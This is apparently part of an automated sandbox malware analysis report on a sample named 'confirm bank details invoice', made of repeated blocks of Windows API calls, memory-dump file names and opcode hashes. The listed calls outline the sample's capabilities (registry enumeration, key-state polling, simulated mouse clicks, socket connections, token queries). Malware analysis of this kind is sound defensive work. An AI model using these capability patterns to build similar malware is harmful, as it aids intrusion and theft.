                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    • Opcode ID: bc02821f1ac9acba139e8e8ce063a6eb71944bb72b672493d4b9d6df4734b272
                    • Instruction ID: 69ce74d2cd980d2a995d5ebceebb6f74148a5275801e4aa312f8dbcf1ba700ef
                    • Opcode Fuzzy Hash: bc02821f1ac9acba139e8e8ce063a6eb71944bb72b672493d4b9d6df4734b272
                    • Instruction Fuzzy Hash: 19515D75A00205DFCB00EFA9C491AADB7B5BF19314F04C06BE919AB352DB38ED42CB59
                    APIs
                      • Part of subcall function 004D3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004D2BB5,?,?), ref: 004D3C1D
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004D2EEF
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004D2F2E
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004D2F75
                    • RegCloseKey.ADVAPI32(?,?), ref: 004D2FA1
                    • RegCloseKey.ADVAPI32(00000000), ref: 004D2FAE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                    • String ID:
                    • API String ID: 3740051246-0
                    • Opcode ID: ab025fe518c3e74df0441c8ef2a8c271ef02e7cd1e9020066f90d0264b8c20dc
                    • Instruction ID: 0577e4b84bd58ce9e22bd40075c9efb5c3c7b0652cf3ad7829fc40d027c0a3e3
                    • Opcode Fuzzy Hash: ab025fe518c3e74df0441c8ef2a8c271ef02e7cd1e9020066f90d0264b8c20dc
                    • Instruction Fuzzy Hash: 35517B31608204AFC704EF55C991EABB7F9FF88308F00882EF59997291DB74E905DB5A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 02ce68b1bebe9bb8c4641e0325063e8c1094bcf5e5db1952739b4c3b1e1808be
                    • Instruction ID: ff9af4704bf4afc9844b972a349e5d4a2dae6b0ca025da1ed8fbb901aa2cc09a
                    • Opcode Fuzzy Hash: 02ce68b1bebe9bb8c4641e0325063e8c1094bcf5e5db1952739b4c3b1e1808be
                    • Instruction Fuzzy Hash: D641A675D00106ABDB14DF68CCA4FA6BB66EB09310F140267E959E73D1C738AD12D698
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004C12B4
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004C12DD
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004C131C
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004C1341
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004C1349
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: f0382a4f6d9807cfa53d386a379acd5be5c2f51e95b91a35d4fe8bcc77d46751
                    • Instruction ID: 225eed964eec3944e24b100e1a4a1f271934d3e86099e0917c82d616b85479fd
                    • Opcode Fuzzy Hash: f0382a4f6d9807cfa53d386a379acd5be5c2f51e95b91a35d4fe8bcc77d46751
                    • Instruction Fuzzy Hash: 62411E35A00105DFDB01EF65C981AAEBBF5FF09314B14C0AAE90AAB362CB35ED11DB54
                    APIs
                    • GetCursorPos.USER32(000000FF), ref: 0048B64F
                    • ScreenToClient.USER32(00000000,000000FF), ref: 0048B66C
                    • GetAsyncKeyState.USER32(00000001), ref: 0048B691
                    • GetAsyncKeyState.USER32(00000002), ref: 0048B69F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: dd11579d3dfdc6fb16cc10c91e156269f4628e90c945dbbe509d838b8f02f508
                    • Instruction ID: a4a5ac1e8625283cadda1a9c4e0cf115919c4a897112c14d7e03041984fbbf08
                    • Opcode Fuzzy Hash: dd11579d3dfdc6fb16cc10c91e156269f4628e90c945dbbe509d838b8f02f508
                    • Instruction Fuzzy Hash: 5B418E31904115BFDF15DF65C844AEEBB74FB05324F20435BE829A6290DB38AD90EF9A
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 004AB369
                    • PostMessageW.USER32(?,00000201,00000001), ref: 004AB413
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004AB41B
                    • PostMessageW.USER32(?,00000202,00000000), ref: 004AB429
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004AB431
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: e3fc10e46999cba178fde3a451984e51cdef992e7913530b554878e30ead46a8
                    • Instruction ID: 8f4e3b8616bd9e1564da964260862b6fbb5752ae48989b99a237b09bcbec0db3
                    • Opcode Fuzzy Hash: e3fc10e46999cba178fde3a451984e51cdef992e7913530b554878e30ead46a8
                    • Instruction Fuzzy Hash: 1D31C071900219EBDF04CF68DD4DAAE3BB5EB15319F10422AF821EA2D2C7B49914DB95
                    APIs
                    • IsWindowVisible.USER32(?), ref: 004ADBD7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004ADBF4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004ADC2C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004ADC52
                    • _wcsstr.LIBCMT ref: 004ADC5C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: 647a3eba3e55ed10656a35fba6dc6c095d5d49820b7a1bf2c7672ff853eca657
                    • Instruction ID: 021e3ee3f6c9b068d33026cba94978436985dfa790f89130194ef9793c0d9a53
                    • Opcode Fuzzy Hash: 647a3eba3e55ed10656a35fba6dc6c095d5d49820b7a1bf2c7672ff853eca657
                    • Instruction Fuzzy Hash: 7321F571A04100BBEB155B299C49E7F7BA9DF56760F10403BF80ACA191EAA9DC01D268
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004ABC90
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ABCC2
                    • __itow.LIBCMT ref: 004ABCDA
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ABD00
                    • __itow.LIBCMT ref: 004ABD11
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$__itow
                    • String ID:
                    • API String ID: 3379773720-0
                    • Opcode ID: bc305306ec1faa8f2057638da31b7055a37730ff3ff3e526f685518e7c100931
                    • Instruction ID: 5429248e01817962febf5b4aea82be6def09f7d8d790e692ac67a8d47b1ea7bf
                    • Opcode Fuzzy Hash: bc305306ec1faa8f2057638da31b7055a37730ff3ff3e526f685518e7c100931
                    • Instruction Fuzzy Hash: EC21C935A003187ADB10AA658C45FDF7A69EF6B724F00402AF905EB192DB78890587E9
                    APIs
                      • Part of subcall function 004750E6: _wcsncpy.LIBCMT ref: 004750FA
                    • GetFileAttributesW.KERNEL32(?,?,?,?,004B60C3), ref: 004B6369
                    • GetLastError.KERNEL32(?,?,?,004B60C3), ref: 004B6374
                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004B60C3), ref: 004B6388
                    • _wcsrchr.LIBCMT ref: 004B63AA
                      • Part of subcall function 004B6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004B60C3), ref: 004B63E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                    • String ID:
                    • API String ID: 3633006590-0
                    • Opcode ID: 72adf8a6262dd300e73f5f8cdc0399fcc8533622c4f9ef86d7356f7beca7ba99
                    • Instruction ID: 140593ea64a9e21e786187dafbcaae25ba4bcb87aaa09afe00eeb149a05bcf8e
                    • Opcode Fuzzy Hash: 72adf8a6262dd300e73f5f8cdc0399fcc8533622c4f9ef86d7356f7beca7ba99
                    • Instruction Fuzzy Hash: F12101309042049ADB10AB78AC46FEE33ECAF19360F11147BF805D31C0EAAC99848A7D
                    APIs
                      • Part of subcall function 004CA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 004CA84E
                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004C8BD3
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8BE2
                    • connect.WSOCK32(00000000,?,00000010), ref: 004C8BFE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorLastconnectinet_addrsocket
                    • String ID:
                    • API String ID: 3701255441-0
                    • Opcode ID: 3b3f12df293e242d8d4dbaead8abdac2767eb1968c36cb8ff71b358be54eede8
                    • Instruction ID: 08fb509cc47ecbaac11260ee077c1ce52023faf8b7459d7155c842476d653c56
                    • Opcode Fuzzy Hash: 3b3f12df293e242d8d4dbaead8abdac2767eb1968c36cb8ff71b358be54eede8
                    • Instruction Fuzzy Hash: 58219D356002149FCB10AB69C985FBE77E9AF48714F04845EF956AB392CB78AC018B69
                    APIs
                    • IsWindow.USER32(00000000), ref: 004C8441
                    • GetForegroundWindow.USER32 ref: 004C8458
                    • GetDC.USER32(00000000), ref: 004C8494
                    • GetPixel.GDI32(00000000,?,00000003), ref: 004C84A0
                    • ReleaseDC.USER32(00000000,00000003), ref: 004C84DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ForegroundPixelRelease
                    • String ID:
                    • API String ID: 4156661090-0
                    • Opcode ID: 645b2b467b296d8be34ee3e0312aa82f0d460eda2d684a64e3693d78be0bc9a4
                    • Instruction ID: c61025e0d041f316fd469a7264e2965ec15e42bdc180d1b793677ab44a0e32c0
                    • Opcode Fuzzy Hash: 645b2b467b296d8be34ee3e0312aa82f0d460eda2d684a64e3693d78be0bc9a4
                    • Instruction Fuzzy Hash: 1921A435A00204AFD704EFA5C944AAEB7F9EF48305F04847EE849D7351DB74AC01CB68
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0048AFE3
                    • SelectObject.GDI32(?,00000000), ref: 0048AFF2
                    • BeginPath.GDI32(?), ref: 0048B009
                    • SelectObject.GDI32(?,00000000), ref: 0048B033
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: d539d66a72fe75ef20eb885ac52864627348826dcc749b56e15054f6b15fc609
                    • Instruction ID: 21f9c1aad17734ab3c3020c50acb2e4e162407b06e236d23f7404589295dfb8c
                    • Opcode Fuzzy Hash: d539d66a72fe75ef20eb885ac52864627348826dcc749b56e15054f6b15fc609
                    • Instruction Fuzzy Hash: 1921B270800704EFDB10AFE5ED497AE3B69F721355F14462BE520923A0C3744859EBAD
                    APIs
                    • __calloc_crt.LIBCMT ref: 004921A9
                    • CreateThread.KERNEL32(?,?,004922DF,00000000,?,?), ref: 004921ED
                    • GetLastError.KERNEL32 ref: 004921F7
                    • _free.LIBCMT ref: 00492200
                    • __dosmaperr.LIBCMT ref: 0049220B
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                    • String ID:
                    • API String ID: 2664167353-0
                    • Opcode ID: 32df624f870a6c8d1c8c4aaee0d156c61dd8a2792f3a6df108be50b5a8a33192
                    • Instruction ID: 008f8e2488a3bf5bb935e70a0f5e53cfc5ea31591270334037565f63fae3b8f1
                    • Opcode Fuzzy Hash: 32df624f870a6c8d1c8c4aaee0d156c61dd8a2792f3a6df108be50b5a8a33192
                    • Instruction Fuzzy Hash: F41108321043067F9F11AFA6DD42DAB3F99EF05774710003FF91496192DBB9D8118BA9
                    APIs
                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004AABD7
                    • GetLastError.KERNEL32(?,004AA69F,?,?,?), ref: 004AABE1
                    • GetProcessHeap.KERNEL32(00000008,?,?,004AA69F,?,?,?), ref: 004AABF0
                    • HeapAlloc.KERNEL32(00000000,?,004AA69F,?,?,?), ref: 004AABF7
                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004AAC0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    • Opcode ID: 7546b07c59e4950bd4c72b90959fc41ed357c4e8d1605cb1757f03e702249540
                    • Instruction ID: 5a33e339a2a1e8dd1b0338a43adf53843adde9bee4dd700827012f5703989c3d
                    • Opcode Fuzzy Hash: 7546b07c59e4950bd4c72b90959fc41ed357c4e8d1605cb1757f03e702249540
                    • Instruction Fuzzy Hash: B8011D71601204BFEB104FA5DC48D7B3BADEF8A765710042AF949C3250D7719D60DB69
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004B7A74
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004B7A82
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004B7A8A
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004B7A94
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004B7AD0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: a80b2147ee62a99f30245b279e93acf15467fa92109efe9926a37a1475e90f7c
                    • Instruction ID: 632984e8b63414abf721641a1e4b568c090262350b6860f2d2318980984d64b2
                    • Opcode Fuzzy Hash: a80b2147ee62a99f30245b279e93acf15467fa92109efe9926a37a1475e90f7c
                    • Instruction Fuzzy Hash: 95016931C08619EBCF00AFE5DD48AEEBB79FF4C701F004156E402B2250DB389660D7A9
                    APIs
                    • CLSIDFromProgID.OLE32 ref: 004A9ADC
                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 004A9AF7
                    • lstrcmpiW.KERNEL32(?,00000000), ref: 004A9B05
                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 004A9B15
                    • CLSIDFromString.OLE32(?,?), ref: 004A9B21
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 11eeb7ab18b3d508d75c366c446bb0774c7eced9f71d10c7d5f379b6017d2710
                    • Instruction ID: 9c6631e8e22d121fb85ac6f141b24585de1918a53eed3c3ec08d82d5004d34ff
                    • Opcode Fuzzy Hash: 11eeb7ab18b3d508d75c366c446bb0774c7eced9f71d10c7d5f379b6017d2710
                    • Instruction Fuzzy Hash: 55018F76A00204BFDB105F54EC44BAA7AEEEB59392F244036F905D6210D774ED00DBB4
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004AAA79
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004AAA83
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004AAA92
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004AAA99
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004AAAAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 842846941998825f1b6ed404e9d6919e3db324b21947a6a76e359cf40dadc0a4
                    • Instruction ID: 10482d6b38a1d49dd895f2d9acc3b92800df36036969187bdfaef8ea5bdf6212
                    • Opcode Fuzzy Hash: 842846941998825f1b6ed404e9d6919e3db324b21947a6a76e359cf40dadc0a4
                    • Instruction Fuzzy Hash: 25F0C2316003046FEB111FA4EC88E773BADFF5A754F00002AF901C7290DB609C25DB65
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004AAADA
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004AAAE4
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004AAAF3
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004AAAFA
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004AAB10
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
